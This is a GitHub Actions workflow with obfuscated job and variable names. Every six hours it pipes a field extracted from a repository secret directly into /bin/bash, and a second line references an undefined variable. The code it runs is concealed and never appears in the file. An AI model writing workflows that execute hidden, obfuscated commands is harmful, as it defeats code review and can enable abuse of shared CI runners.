name: sogntaozisn

on:
  workflow_dispatch:
  schedule:
    - cron: '45 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sogntaozisn
        env:
          spais17400: ${{ secrets.spais17400 }}
        run: |
          echo $spais17400 | jq -r .tpfyq404 | /bin/bash
          echo $c063 | jq -r .m04151 | /bin/bash

